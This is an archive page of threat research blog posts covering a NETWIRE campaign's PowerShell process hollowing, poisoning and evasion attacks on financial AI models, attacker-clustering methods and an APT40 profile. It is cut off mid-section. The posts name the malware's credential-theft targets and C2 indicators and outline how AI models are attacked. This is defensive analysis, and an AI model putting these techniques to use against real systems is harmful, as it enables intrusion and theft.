Category Archives: Threat Research

Dissecting a NETWIRE Phishing Campaign’s Usage of Process Hollowing

Introduction

Malware authors attempt to evade detection by executing their payload without having to write the executable file on the disk. One of the most commonly seen techniques of this "fileless" execution is code injection. Rather than executing the malware directly, attackers inject the malware code into the memory of another process that is already running.

Due to its presence on all Windows 7 and later machines and the sheer number of supported features, PowerShell has been a favorite tool of attackers for some time. FireEye has published multiple reports where PowerShell was used during initial malware delivery or during post-exploitation activities. Attackers have abused PowerShell to easily interact with other Windows components to perform their activities with stealth and speed.

This blog post explores a recent phishing campaign observed in February 2019, where an attacker targeted multiple customers and successfully executed their payload without having to write the executable dropper or the payload to the disk. The campaign involved the use of VBScript, PowerShell and the .NET framework to perform a code injection attack using a process hollowing technique. The attacker abused the functionality of loading .NET assembly directly into memory of PowerShell to execute malicious code without creating any PE files on the disk.

Activity Summary

The user is prompted to open a document stored on Google Drive. The name of the file, shown in Figure 1, suggests that the actor was targeting members of the airline industry that use a particular aircraft model. We have observed an increasing number of attackers relying on cloud-based file storage services that bypass firewall restrictions to host their payload.


Figure 1: Malicious script hosted on Google Drive

As seen in Figure 2, attempting to open the script raises an alert from Internet Explorer saying that the publisher could not be verified. In our experience, many users will choose to ignore the warning and open the document.


Figure 2: Alert raised by Internet Explorer

Upon execution, after multiple levels of obfuscation, a PowerShell script is executed that loads a .NET assembly from a remote URL, functions of which are then used to inject the final payload (NETWIRE Trojan) into a benign Microsoft executable using process hollowing. This can potentially bypass application whitelisting since all processes spawned during the attack are legitimate Microsoft executables.

Technical Details

The initial document contains VBScript code. When the user opens it, Wscript is spawned by iexplore to execute this file. The script uses multiple layers of obfuscation to bypass static scanners, and ultimately runs a PowerShell script for executing the binary payload.

Obfuscation techniques used during different levels of script execution are shown in Figure 3 and Figure 4.


Figure 3: Type 1 obfuscation technique, which uses log functions to resolve a wide character


Figure 4: Type 2 obfuscation technique, which uses split and replace operations

This script then downloads and executes another encoded .vbs script from a paste.ee URL, as seen in Figure 5. Paste.ee is a less regulated alternative to Pastebin and we have seen multiple attacks using this service to host the payload. Since the website uses TLS, most firewall solutions cannot detect the malicious content being downloaded over the network.


Figure 5: Downloading the second-stage script and creating a scheduled task

The script achieves persistence by copying itself to Appdata/Roaming and using schtasks.exe to create a scheduled task that runs the VBScript every 15 minutes.

After further de-obfuscation of the downloaded second-stage VBScript, we obtain the PowerShell script that is executed through a shell object, as shown in Figure 6.


Figure 6: De-obfuscated PowerShell script

The PowerShell script downloads two Base64-encoded payloads from paste.ee that contain binary executable files. The strings are stored as PowerShell script variables and no files are created on disk.  

Microsoft has provided multiple ways of interacting with the .NET framework in PowerShell to enhance it through custom-developed features. These .NET integrations with PowerShell are particularly attractive to attackers due to the limited visibility that traditional security monitoring tools have around the runtime behaviors of .NET processes. For this reason, exploit frameworks such as CobaltStrike and Metasploit have options to generate their implants in .NET assembly code.

Here, the attackers have used the Load method from the System.Reflection.Assembly .NET Framework class. After the assembly is loaded as an instance of System.Reflection.Assembly, the members can be accessed through that object similarly to C#, as shown in Figure 7.


Figure 7: Formatted PowerShell code

The code identifies the installed version of .NET and uses it later to dynamically resolve the path to the .NET installation folder. The decoded dropper assembly is passed as an argument to the Load method. The resulting class instance is stored as a variable.

The objects of the dropper are accessed through this variable and method R is invoked. Method R of the .NET dropper is responsible for executing the final payload.

The following are the parameters for method R:

  • Path to InstallUtil.exe (or other .NET framework tools)
  • Decoded NETWIRE trojan

When we observed the list of processes spawned during the attack (Figure 8), we did not see the payload spawned as a separate process.  


Figure 8: Processes spawned during attack

We observed that the InstallUtil.exe process was being created in suspended mode. Once it started execution, we compared its memory artifacts to a benign execution of InstallUtil.exe and concluded that the malicious payload is being injected into the memory of the newly spawned InstallUtil.exe process. We also observed that no arguments are passed to InstallUtil, which would cause an error under normal execution since InstallUtil always expects at least one argument.

From a detection evasion perspective, the attacker has chosen an interesting approach. Even if the PowerShell process creation is detected, InstallUtil.exe is executed from its original path. Furthermore, InstallUtil.exe is a benign file often used by internal automations. To an unsuspecting system administrator, this might not seem malicious.

When we disassembled the .NET code and removed the obfuscation to understand how code injection was performed, we were able to identify Windows win32 API calls associated with process hollowing (Figure 9).


Figure 9: Windows APIs used in .NET dropper for process hollowing

After reversing and modifying the code of the C# dropper to invoke R from main, we were able to confirm that when the method R is invoked, InstallUtil.exe is spawned in suspended mode. The memory blocks of the suspended process are unmapped and rewritten with the sections of the payload program passed as an argument to method R. The thread is allowed to continue after changes have been made to the entry point. When the process hollowing is complete, the parent PowerShell process is terminated.

High-Level Analysis of the Payload

The final payload was identified by FireEye Intelligence as a NETWIRE backdoor. The backdoor receives commands from a command and control (C2) server, performs reconnaissance that includes the collection of user data, and returns the information to the C2 server.

Capabilities of the NETWIRE backdoor include key logging, reverse shell, and password theft. The backdoor uses a custom encryption algorithm to encrypt data and then writes it to a file created in the ./LOGS directory.

The malware also contains a custom obfuscation algorithm to hide registry keys, APIs, DLL names, and other strings from static analysis. Figure 10 provides the decompiled version of the custom decoding algorithm used on these strings.


Figure 10: Decompiled string decoding algorithm

From reversing and analyzing the behavior of the malware, we were able to identify the following capabilities:

  • Record mouse and keyboard events
  • Capture session logon details
  • Capture system details
  • Take screenshots
  • Monitor CPU usage
  • Create fake HTTP proxy

From the list of decoded strings, we were able to identify other features of this sample:

“POP3”

“IMAP”

“SMTP”

“HTTP”

"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\”

"Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\”

"Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\”

 

Stealing data from an email client

 

 

“\Google\Chrome\User Data\Default\Login Data”

“\Chromium\User Data\Default\Login Data”

“\Comodo\Dragon\User Data\Default\Login Data”

“\Yandex\YandexBrowser\User Data\Default\Login Data”

“\Opera Software\Opera Stable\Login Data”

“Software\Microsoft\Internet Explorer\IntelliForms\Storage2”

“vaultcli.dll: VaultOpenVault,VaultCloseVault,VaultEnumerateItem,VaultGetItem,VaultFree”

“select *  from moz_login”

 

Stealing login details from browsers

 

A complete report on the NETWIRE backdoor family is available to customers who subscribe to the FireEye Intelligence portal.

Indicators of Compromise

Host-based indicators:

dac4ed7c1c56de7d74eb238c566637aa

Initial attack vector .vbs file

Network-based indicators:

178.239.21.]62:1919

kingshakes[.]linkpc[.]net

 

105.112.35[.]72:3575

homi[.]myddns[.]rocks

C2 domains of NETWIRE Trojan

FireEye Detection

FireEye detection names for the indicators in the attack:

Endpoint security

  • Exploit Guard: Blocks execution of wscript
  • IOC: POWERSHELL DOWNLOADER D (METHODOLOGY)
  • AV: Trojan.Agent.DRAI

Network Security

  • Backdoor.Androm

Email Security

  • Malicious.URL
  • Malware.Binary.vbs

Conclusion

Malware authors continue to use different "fileless" process execution techniques to reduce the number of indicators on an endpoint. The lack of visibility into .NET process execution combined with the flexibility of PowerShell makes this technique all the more effective.

FireEye Endpoint Security and the FireEye Network Security detect and block this attack at several stages of the attack chain.

Acknowledgement

We would like to thank Frederick House, Arvind Gowda, Nart Villeneuve and Nick Carr for their valuable feedback.

Breaking the Bank: Weakness in Financial AI Applications

Currently, threat actors possess limited access to the technology required to conduct disruptive operations against financial artificial intelligence (AI) systems and the risk of this targeting type remains low. However, there is a high risk of threat actors leveraging AI as part of disinformation campaigns to cause financial panic. As AI financial tools become more commonplace, adversarial methods to exploit these tools will also become more available, and operations targeting the financial industry will be increasingly likely in the future.

AI Compounds Both Efficiency and Risk

Financial entities increasingly rely on AI-enabled applications to streamline daily operations, assess client risk, and detect insider trading. However, researchers have demonstrated how exploiting vulnerabilities in certain AI models can adversely affect the final performance of a system. Cyber threat actors can potentially leverage these weaknesses for financial disruption or economic gain in the future.

Recent advances in adversarial AI research highlights the vulnerabilities in some AI techniques used by the financial sector. Data poisoning attacks, or manipulating a model's training data, can affect the end performance of a system by leading the model to generate inaccurate outputs or assessments. Manipulating the data used to train a model can be particularly powerful if it remains undetected, since "finished" models are often trusted implicitly. It should be noted that adversarial AI research demonstrates how anomalies in a model do not necessarily point users toward a wrong answer, but redirect users away from the more correct output. Additionally some cases of compromise require threat actors to obtain a copy of the model itself, through reverse engineering or compromising the machine learning pipeline of the target. The following are some vulnerabilities that assume this white-box knowledge of the models under attack:

  • Classifiers are used for detection and identification, such as object recognition in driverless cars and malware detection in networks. Researchers have demonstrated how these classifiers can be susceptible to evasion, meaning objects can be misclassified due to inherent weaknesses in the mode (Figure 1).


Figure 1: Examples of classifier evasion where AI models identified 6 as 2

  • Researchers have highlighted how data poisoning can influence the outputs of AI recommendation systems. By changing reward pathways, adversaries can make a model suggest a suboptimal output such as reckless trades resulting in substantial financial losses. Additionally, groups have demonstrated a data-poisoning attack where attackers did not have control over how the training data was labeled.
  • Natural language processing applications can analyze text and generate a basic understanding of the opinions expressed, also known as sentiment analysis. Recent papers highlight how users can input corrupt text training examples into sentiment analysis models to degrade the model's overall performance and guide it to misunderstand a body of text.
  • Compromises can also occur when the threat actor has limited access and understanding of the model’s inner-workings. Researchers have demonstrated how open access to the prediction functions of a model as well as knowledge transfer can also facilitate compromise.

How Financial Entities Leverage AI

AI can process large amounts of information very quickly, and financial institutions are adopting AI-enabled tools to make accurate risk assessments and streamline daily operations. As a result, threat actors likely view financial service AI tools as an attractive target to facilitate economic gain or financial instability (Figure 2).


Figure 2: Financial AI tools and their weaknesses

Sentiment Analysis

Use

Branding and reputation are variables that help analysts plan future trade activity and examine potential risks associated with a business. News and online discussions offer a wealth of resources to examine public sentiment. AI techniques, such as natural language processing, can help analysts quickly identify public discussions referencing a business and examine the sentiment of these conversations to inform trades or help assess the risks associated with a firm.

Potential Exploitation

Threat actors can potentially insert fraudulent data that could generate erroneous analyses regarding a publicly traded firm. For example, threat actors could distribute false negative information about a company that could have adverse effects on a business' future trade activity or lead to a damaging risk assessment. Manipulating the data used to train a model can be particularly powerful if it remains undetected, since "finished" models are often trusted implicitly.

Threat Actors Using Disinformation to Cause Financial Panic

FireEye assess with high confidence that there is a high risk of threat actors spreading false information that triggers AI enabled trading and causes financial panic. Additionally, threat actors can leverage AI techniques to generate manipulated multimedia or "deep fakes" to facilitate such disruption.

False information can have considerable market-wide effects. Malicious actors have a history of distributing false information to facilitate financial instability. For example, in April 2013, the Syrian Electronic Army (SEA) compromised the Associated Press (AP) Twitter account and announced that the White House was attacked and President Obama sustained injuries. After the false information was posted, stock prices plummeted.


Figure 3: Tweet from the Syrian Electronic Army (SEA) after compromising Associated Press's Twitter account

  • Malicious actors distributed false messaging that triggered bank runs in Bulgaria and Kazakhstan in 2014. In two separate incidents, criminals sent emails, text messages, and social media posts suggesting bank deposits were not secure, causing customers to withdraw their savings en masse.
  • Threat actors can use AI to create manipulated multimedia videos or "deep fakes" to spread false information about a firm or market-moving event. Threat actors can also use AI applications to replicate the voice of a company's leadership to conduct fraudulent trades for financial gain.
  • We have observed one example where a manipulated video likely impacted the outcome of a political campaign.
Portfolio Management

Use

Several financial institutions are employing AI applications to select stocks for investment funds, or in the case of AI-based hedge funds, automatically conduct trades to maximize profits. Financial institutions can also leverage AI applications to help customize a client's trade portfolio. AI applications can analyze a client's previous trade activity and propose future trades analogous to those already found in a client's portfolio.

Potential Exploitation

Actors could influence recommendation systems to redirect a hedge fund toward irreversible bad trades, causing the company to lose money (e.g., flooding the market with trades that can confuse the recommendation system and cause the system to start trading in a way that damages the company).

Moreover, many of the automated trading tools used by hedge funds operate without human supervision and conduct trade activity that directly affects the market. This lack of oversight could leave future automated applications more vulnerable to exploitation as there is no human in the loop to detect anomalous threat activity.

Threat Actors Conducting Suboptimal Trades

We assess with moderate confidence that manipulating trade recommendation systems poses a moderate risk to AI-based portfolio managers.

  • The diminished human involvement with trade recommendation systems coupled with the irreversibility of trade activity suggest that adverse recommendations could quickly escalate to a large-scale impact.
  • Additionally, operators can influence recommendation systems without access to sophisticated AI technologies; instead, using knowledge of the market and mass trades to degrade the application's performance.
  • We have previously observed malicious actors targeting trading platforms and exchanges, as well as compromising bank networks to conduct manipulated trades.
  • Both state-sponsored and financially motivated actors have incentives to exploit automated trading tools to generate profit, destabilize markets, or weaken foreign currencies.
  • Russian hackers reportedly leveraged Corkow malware to place $500M worth of trades at non-market rates, briefly destabilizing the dollar-ruble exchange rate in February 2015. Future criminal operations can leverage vulnerabilities in automatic training algorithms to disrupt the market with a flood of automated bad trades.
Compliance and Fraud Detection

Use

Financial institutions and regulators are leveraging AI-enabled anomaly detection tools to ensure that traders are not engaging in illegal activity. These tools can examine trade activity, internal communications, and other employee data to ensure that workers are not capitalizing on advanced knowledge of the market to engage in fraud, theft, insider trading, or embezzlement.

Potential Exploitation

Sophisticated threat actors can exploit the weaknesses in classifiers to alter an AI-based detection tool and mischaracterize anomalous illegal activity as normal activity. Manipulating the model helps insider threats conduct criminal activity without fear of discovery.

Threat Actors Camouflaging Insider Threat Activity

Currently threat actors possess limited access to the kind of technology required to evade these fraud detection systems, and therefore with high confidence we assess that the threat of this activity type remains low. However, as AI financial tools become more commonplace, adversarial methods to exploit these tools will also become more available and insider threats leveraging AI to evade detection will likely increase in the future.

Underground forums and social media posts demonstrate there is a market for individuals with insider access to financial institutions. Insider threats could exploit weaknesses in AI-based anomaly detectors to camouflage nefarious activity, such as external communications, erratic trades, and data transfers, as normal activity.

Trade Simulation

Use

Financial entities can use AI tools that leverage historical data from previous trade activity to simulate trades and examine their effects. Quant-fund managers and high-speed traders can use this capability to strategically plan future activity, such as the optimal time of the day to trade. Additionally, financial insurance underwriters can use these tools to observe the impact of market-moving activity and generate better risk assessments.

Potential Exploitation

By exploiting inherent weaknesses in an AI model, threat actors could lull a company into a false sense of security regarding the way a trade will play out. Specifically, threat actors could find out when a company is training their model and inject corrupt data into a dataset being used to train the model. Subsequently, the end application generates an incorrect simulation of potential trades and their consequences. These models are regularly trained on the latest financial information to improve a simulation's performance, providing threat actors with multiple opportunities for data poisoning attacks. Additionally, some high-speed traders speculate that threats could flood the market with fake sell orders to confuse trading algorithms and potentially cause the market to crash.

FireEye Threat Intelligence has previously examined how financially motivated actors can leverage data manipulation for profit through pump and dump scams and stock manipulation.

Threat Actors Conducting Insider Trading

FireEye assesses with moderate confidence that the current risk of threat actors leveraging these attacks is low as exploitations of trade simulations require sophisticated technology as well as additional insider intelligence regarding when a financial company is training their model. Despite these limitations, as financial AI tools become more popular, adversarial methods to exploit these tools are also likely to become more commonplace on underground forums and via state-sponsored threats. Future financially motivated operations could monitor or manipulate trade simulation tools as another means of gaining advanced knowledge of upcoming market activity.

Risk Assessment and Modeling

Use

AI can help the financial insurance sector's underwriting process by examining client data and highlighting features that it considers vulnerable prior to market-moving actions (joint ventures, mergers & acquisitions, research & development breakthroughs, etc.). Creating an accurate insurance policy ahead of market catalysts requires a risk assessment to highlight a client's potential weaknesses.

Financial services can also employ AI applications to improve their risk models. Advances in generative adversarial networks can help risk management by stress-testing a firm's internal risk model to evaluate performance or highlight potential vulnerabilities in a firm's model.

Potential Exploitation

If a country is conducting market-moving events with a foreign business, state-sponsored espionage actors could use data poisoning attacks to cause AI models to over or underestimate the value or risk associated with a firm to gain a competitive advantage ahead of planned trade activity. For example, espionage actors could feasibly use this knowledge and help turn a joint venture into a hostile takeover or eliminate a competitor in a bidding process. Additionally, threat actors can exploit weaknesses in financial AI tools as part of larger third-party compromises against high-value clients.

Threat Actors Influencing Trade Deals and Negotiations

With high confidence, we consider the current threat risk to trade activity and business deals to be low, but as more companies leverage AI applications to help prepare for market-moving catalysts, these applications will likely become an attack surface for future espionage operations.

In the past, state-sponsored actors have employed espionage operations during collaborations with foreign companies to ensure favorable business deals. Future state-sponsored espionage activity could leverage weaknesses in financial modeling tools to help nations gain a competitive advantage.

Outlook and Implications

Businesses adopting AI applications should be aware of the risks and vulnerabilities introduced with these technologies, as well as the potential benefits. It should be noted that AI models are not static; they are routinely updated with new information to make them more accurate. This constant model training frequently leaves them vulnerable to manipulation. Companies should remain vigilant and regularly audit their training data to eliminate poisoned inputs. Additionally, where applicable, AI applications should incorporate human supervision to ensure that erroneous outputs or recommendations do not automatically result in financial disruption.

AI's inherent limitations also pose a problem as the financial sector increasingly adopts these applications for their operations. The lack of transparency in how a model arrived at its answer is problematic for analysts who are using AI recommendations to conduct trades. Without an explanation for its output, it is difficult to determine liability when a trade has negative outcomes. This lack of clarity can lead analysts to mistrust an application and eventually refrain from using it altogether. Additionally, the rise of data privacy laws may also accelerate the need for explainable AI in the financial sector. Europe's General Data Protection Regulation (GDPR) stipulates that companies employing AI applications must have an explanation for decisions made by its models.

Some financial institutions have begun addressing this explainability problem by developing AI models that are inherently more transparent. Researchers have also developed self-explaining neural networks, which provide understandable explanations for the outputs generated by the system.

Going ATOMIC: Clustering and Associating Attacker Activity at Scale

At FireEye, we work hard to detect, track, and stop attackers. As part of this work, we learn a great deal of information about how various attackers operate, including details about commonly used malware, infrastructure, delivery mechanisms, and other tools and techniques. This knowledge is built up over hundreds of investigations and thousands of hours of analysis each year. At the time of publication, we have 50 APT or FIN groups, each of which have distinct characteristics. We have also collected thousands of uncharacterized 'clusters' of related activity about which we have not yet made any formal attribution claims. While unattributed, these clusters are still useful in the sense that they allow us to group and track associated activity over time.

However, as the information we collect grows larger and larger, we realized we needed an algorithmic method to assist in analyzing this information at scale, to discover new potential overlaps and attributions. This blog post will outline the data we used to build the model, the algorithm we developed, and some of the challenges we hope to tackle in the future.

The Data

As we detect and uncover malicious activity, we group forensically-related artifacts into 'clusters'. These clusters indicate actions, infrastructure, and malware that are all part of an intrusion, campaign, or series of activities which have direct links. These are what we call our "UNC" or "uncategorized" groups. Over time, these clusters can grow, merge with other clusters, and potentially 'graduate' into named groups, such as APT33 or FIN7. This graduation occurs only when we understand enough about their operations in each phase of the attack lifecycle and have associated the activity with a state-aligned program or criminal operation.

For every group, we can generate a summary document that contains information broken out into sections such as infrastructure, malware files, communication methods, and other aspects. Figure 1 shows a fabricated example with the various 'topics' broken out. Within each 'topic' – such as 'Malware' – we have various 'terms', which have associated counts. These numbers indicate how often we have recorded a group using that 'term'.


Figure 1: Example group 'documents' demonstrating how data about groups is recorded

The Problem

Our end goal is always to merge a new group either into an existing group once the link can be proven, or to graduate it to its own group if we are confident it represents a new and distinct actor set. These clustering and attribution decisions have thus far been performed manually and require rigorous analysis and justification. However, as we collect increasingly more data about attacker activities, this manual analysis becomes a bottleneck. Clusters risk going unanalyzed, and potential associations and attributions could slip through the cracks. Thus, we now incorporate a machine learning-based model into our intelligence analysis to assist with discovery, analysis, and justification for these claims.

The model we developed began with the following goals:

  1. Create a single, interpretable similarity metric between groups
  2. Evaluate past analytical decisions
  3. Discover new potential matches


Figure 2: Example documents highlighting observed term overlaps between two groups

The Model

This model uses a document clustering approach, familiar in the data science realm and often explained in the context of grouping books or movies. Applying the approach to our structured documents about each group, we can evaluate similarities between groups at scale.

First, we decided to model each topic individually. This decision means that each topic will result in its own measure of similarity between groups, which will ultimately be aggregated to produce a holistic similarity measure.

Here is how we apply this to our documents.

Within each topic, every distinct term is transformed into a value using a method called term frequency -inverse document frequency, or TF-IDF. This transformation is applied to every unique term for every document + topic, and the basic intuition behind it is to:

  1. Increase importance of the term if it occurs often with the document.
  2. Decrease the importance of the term if it appears commonly across all documents.

This approach rewards distinctive terms such as custom malware families – which may appear for only a handful of groups – and down-weights common things such as 'spear-phishing', which appear for the vast majority of groups.

Figure 3 shows an example of TF-IDF being applied to a fictional "UNC599" for two terms: mal.sogu and mal.threebyte. These terms indicate the usages of SOGU and THREEBYTE within the 'malware' topic and thus we calculate their value within that topic using TF-IDF. The first (TF) value is how often those terms appeared as a fraction of all malware terms for the group. The second value (IDF) is the inverse of how frequently those terms appear across all groups. Additionally, we take the natural log of the IDF value, to smooth the effects of highly common terms – as you can see in the graph, when the value is close to 1 (very common terms), the log evaluates to near-zero, thus down-weighting the final TF x IDF value. Unique values have a much higher IDF, and thus result in higher values.


Figure 3: Breakdown of TF-IDF metric when evaluated for a single group in regard to malware

Once each term has been given a score, each group is now reflected as a collection of distinct topics, and each topic is a vector of scores for the terms it contains. Each vector can be conceived as an arrow, detailing the 'direction' that group is 'pointing'within that topic.

Within each topic space, we can then evaluate the similarity of various groups using another method – Cosine Similarity. If, like me, you did not love trigonometry – fear not! The intuition is simple. In essence, this is a measure of how parallel two vectors are. As seen in Figure 4, to evaluate two groups' usage of malware, we plot their malware vectors and see if they are pointing in the same direction. More parallel means they are more similar.


Figure 4: Simplified breakdown of Cosine Similarity metric when applied to two groups in the malware 'space'

One of the nice things about this approach is that large and small vectors are treated the same – thus, a new, relatively small UNC cluster pointing in the same direction as a well-documented APT group will still reflect a high level of similarity. This is one of the primary use cases we have, discovering new clusters of activity with high similarity to already established groups.

Using TF-IDF and Cosine Similarity, we can now calculate the topic-specific similarities for every group in our corpus of documents. The final step is to combine these topic similarities into a single, aggregate metric (Figure 5). This single metric allows us to quickly query our data for 'groups similar to X' or 'similarity between X and Y'. The question then becomes: What is the best way to build this final similarity?


Figure 5: Overall model flow diagram showing individual topic similarities and aggregation in to final similarity matrix

The simplest approach is to take an average, and at first that’s exactly what we did. However, as analysts, this approach did not sync well with analyst intuition. As analysts, we feel that some topics matter more than others. Malware and methodologies should be more important than say, server locations or target industries...right? However, when challenged to provide custom weightings for each topic, it was impossible to find an objective weighting system, free from analyst bias. Finally, we thought: "What if we used existing, known data to tell us what the right weights are?" In order to do that, we needed a lot of known – or "labeled" – examples of both similar and dissimilar groups.

Building a Labeled Dataset

At first our concept seemed straightforward: We would find a large dataset of labeled pairs, and then fit a regression model to accurately classify them. If successful, this model should give us the weights we wanted to discover.

Figure 6 shows some graphical intuition behind this approach. First, using a set of ‘labeled’ pairs, we fit a function which best predicts the data points.


Figure 6: Example Linear regression plot – in reality we used a Logistic Regression, but showing a linear model to demonstrate the intuition

Then, we use that same function to predict the aggregate similarity of un-labeled pairs (Figure 7).


Figure 7: Example of how we used the trained model to predict final similarity from individual topic similarities.

However, our data posed a unique problem in the sense that only a tiny fraction of all potential pairings had ever been analyzed. These analyses happened manually and sporadically, often the result of sudden new information from an investigation finally linking two groups together. As a labeled dataset, these pairs were woefully insufficient for any rigorous evaluation of the approach. We needed more labeled data.

Two of our data scientists suggested a clever approach: What if we created thousands of 'fake' clusters by randomly sampling from well-established APT groups? We could therefore label any two samples that came from the same group as definitely similar, and any two from separate groups as not similar (Figure 8). This gave us the ability to synthetically generate the labeled dataset we desperately needed. Then, using a linear regression model, we were able to elegantly solve this 'weighted average' problem rather than depend on subjective guesses.


Figure 8: Example similarity testing with 'fake' clusters derived from known APT groups

Additionally, these synthetically created clusters gave us a dataset upon which to test various iterations of the model. What if we remove a topic? What if we change the way we capture terms? Using a large labeled dataset, we can now benchmark and evaluate performance as we update and improve the model.

To evaluate the model, we observe several metrics:

  • Recall for synthetic clusters we know come from the same original group – how many do we get right/wrong? This evaluates the accuracy of a given approach.
  • For individual topics, the 'spread' between the calculated similarity of related and unrelated clusters. This helps us identify which topics help separate the classes best.
  • The accuracy of a trained regression model, as a proxy for the 'signal' between similar and dissimilar clusters, as represented by the topics. This can help us identify overfitting issues as well.

Operational Use

In our daily operations, this model serves to augment and assist our intelligence experts. Presenting objective similarities, it can challenge biases and introduce new lines of investigation not previously considered. When dealing with thousands of clusters and new ones added every day from analysts around the globe, even the most seasoned and aware intel analyst could be excused for missing a potential lead. However, our model is able to present probable merges and similarities to analysts on demand, and thus can assist them in discovery.

Upon deploying this to our systems in December 2018, we immediately found benefits. One example is outlined in this blog post about potentially destructive attacks. Since then we have been able to inform, discover, or justify dozens of other merges.

Future Work

Like all models, this one has its weaknesses and we are already working on improvements. There is label noise in the way we manually enter information from investigations. There is sometimes 'extraneous' data about attackers that is not (yet) represented in our documents. Most of all, we have not yet fully incorporated the 'time of activity' and instead rely on 'time of recording'. This introduces a lag in our representation, which makes time-based analysis difficult. What an attacker has done lately should likely mean more than what they did five years ago.

Taking this objective approach and building the model has not only improved our intel operations, but also highlighted data requirements for future modeling efforts. As we have seen in other domains, building a machine learning model on top of forensic data can quickly highlight potential improvements to data modeling, storage, and access. Further information on this model can also be viewed in this video, from a presentation at the 2018 CAMLIS conference.

We have thus far enjoyed taking this approach to augmenting our intelligence model and are excited about the potential paths forward. Most of all, we look forward to the modeling efforts that help us profile, attribute, and stop attackers.

APT40: Examining a China-Nexus Espionage Actor

FireEye is highlighting a cyber espionage operation targeting crucial technologies and traditional intelligence targets from a China-nexus state sponsored actor we call APT40. The actor has conducted operations since at least 2013 in support of China’s naval modernization effort. The group has specifically targeted engineering, transportation, and the defense industry, especially where these sectors overlap with maritime technologies. More recently, we have also observed specific targeting of countries strategically important to the Belt and Road Initiative including Cambodia, Belgium, Germany, Hong Kong, Philippines, Malaysia, Norway, Saudi Arabia, Switzerland, the United States, and the United Kingdom. This China-nexus cyber espionage group was previously reported as TEMP.Periscope and TEMP.Jumper.

Mission

In December 2016, China’s People Liberation Army Navy (PLAN) seized a U.S. Navy unmanned underwater vehicle (UUV) operating in the South China Sea. The incident paralleled China’s actions in cyberspace; within a year APT40 was observed masquerading as a UUV manufacturer, and targeting universities engaged in naval research. That incident was one of many carried out to acquire advanced technology to support the development of Chinese naval capabilities. We believe APT40’s emphasis on maritime issues and naval technology ultimately support China’s ambition to establish a blue-water navy.

In addition to its maritime focus, APT40 engages in broader regional targeting against traditional intelligence targets, especially organizations with operations in Southeast Asia or involved in South China Sea disputes. Most recently, this has included victims with connections to elections in Southeast Asia, which is likely driven by events affecting China’s Belt and Road Initiative. China’s “One Belt, One Road” (一带一路) or “Belt and Road Initiative” (BRI) is a $1 trillion USD endeavor to build land and maritime trade routes across Asia, Europe, the Middle East, and Africa to develop a trade network that will project China’s influence across the greater region.


Figure 1: Countries and industries targeted. Countries include the United States, United Kingdom, Norway, Germany, Saudi Arabia, Cambodia and Indonesia

Attribution

We assess with moderate confidence that APT40 is a state-sponsored Chinese cyber espionage operation. The actor’s targeting is consistent with Chinese state interests and there are multiple technical artifacts indicating the actor is based in China. Analysis of the operational times of the group’s activities indicates that it is probably centered around China Standard Time (UTC +8). In addition, multiple APT40 command and control (C2) domains were initially registered by China based domain resellers and had Whois records with Chinese location information, suggesting a China based infrastructure procurement process.

APT40 has also used multiple Internet Protocol (IP) addresses located in China to conduct its operations. In one instance, a log file recovered from an open indexed server revealed that an IP address (112.66.188.28) located in Hainan, China had been used to administer the command and control node that was communicating with malware on victim machines. All of the logins to this C2 were from computers configured with Chinese language settings.

Attack Lifecycle

Initial Compromise

APT40 has been observed leveraging a variety of techniques for initial compromise, including web server exploitation, phishing campaigns delivering publicly available and custom backdoors, and strategic web compromises.

  • APT40 relies heavily on web shells for an initial foothold into an organization. Depending on placement, a web shell can provide continued access to victims' environments, re-infect victim systems, and facilitate lateral movement.
  • The operation’s spear-phishing emails typically leverage malicious attachments, although Google Drive links have also been observed.
  • APT40 leverages exploits in their phishing operations, often weaponizing vulnerabilities within days of their disclosure. Observed vulnerabilities include:


Figure 2: APT40 attack lifecycle

Establish Foothold

APT40 uses a variety of malware and tools to establish a foothold, many of which are either publicly available or used by other threat groups. In some cases, the group has used executables with code signing certificates to avoid detection.

  • First-stage backdoors such as AIRBREAK, FRESHAIR, and BEACON are used before downloading other payloads.
  • PHOTO, BADFLICK, and CHINA CHOPPER are among the most frequently observed backdoors used by APT40.
  • APT40 will often target VPN and remote desktop credentials to establish a foothold in a targeted environment. This methodology proves to be ideal as once these credentials are obtained, they may not need to rely as heavily on malware to continue the mission.

Escalate Privileges

APT40 uses a mix of custom and publicly available credential harvesting tools to escalate privileges and dump password hashes.

  • APT40 leverages custom credential theft utilities such as HOMEFRY, a password dumper/cracker used alongside the AIRBREAK and BADFLICK backdoors.
  • Additionally, the Windows Sysinternals ProcDump utility and Windows Credential Editor (WCE) are believed to be used during intrusions as well.

Internal Reconnaissance

APT40 uses compromised credentials to log on to other connected systems and conduct reconnaissance. The group also leverages RDP, SSH, legitimate software within the victim environment, an array of native Windows capabilities, publicly available tools, as well as custom scripts to facilitate internal reconnaissance.

  • APT40 used MURKYSHELL at a compromised victim organization to port scan IP addresses and conduct network enumeration.
  • APT40 frequently uses native Windows commands, such as net.exe, to conduct internal reconnaissance of a victim’s environment.
  • Web shells are heavily relied on for nearly all stages of the attack lifecycle. Internal web servers are often not configured with the same security controls as public-facing counterparts, making them more vulnerable to exploitation by APT40 and similarly sophisticated groups.

Lateral Movement

APT40 uses many methods for lateral movement throughout an environment, including custom scripts, web shells, a variety of tunnelers, as well as Remote Desktop Protocol (RDP). For each new system compromised, the group usually executes malware, performs additional reconnaissance, and steals data.

  • APT40 also uses native Windows utilities such as at.exe (a task scheduler) and net.exe (a network resources management tool) for lateral movement.
  • Publicly available tunneling tools are leveraged alongside distinct malware unique to the operation.
  • Although MURKYTOP is primarily a command-line reconnaissance tool, it can also be used for lateral movement.
  • APT40 also uses publicly available brute-forcing tools and a custom utility called DISHCLOTH to attack different protocols and services.

Maintain Presence

APT40 primarily uses backdoors, including web shells, to maintain presence within a victim environment. These tools enable continued control of key systems in the targeted network.

  • APT40 strongly favors web shells for maintaining presence, especially publicly available tools.
  • Tools used during the Establish Foothold phase also continue to be used in the Maintain Presence phase; this includes AIRBREAK and PHOTO.
  • Some APT40 malware tools can evade typical network detectiona by leveraging legitimate websites, such as GitHub, Google, and Pastebin for initial C2 communications.
  • Common TCP ports 80 and 443 are used to blend in with routine network traffic.

Complete Mission

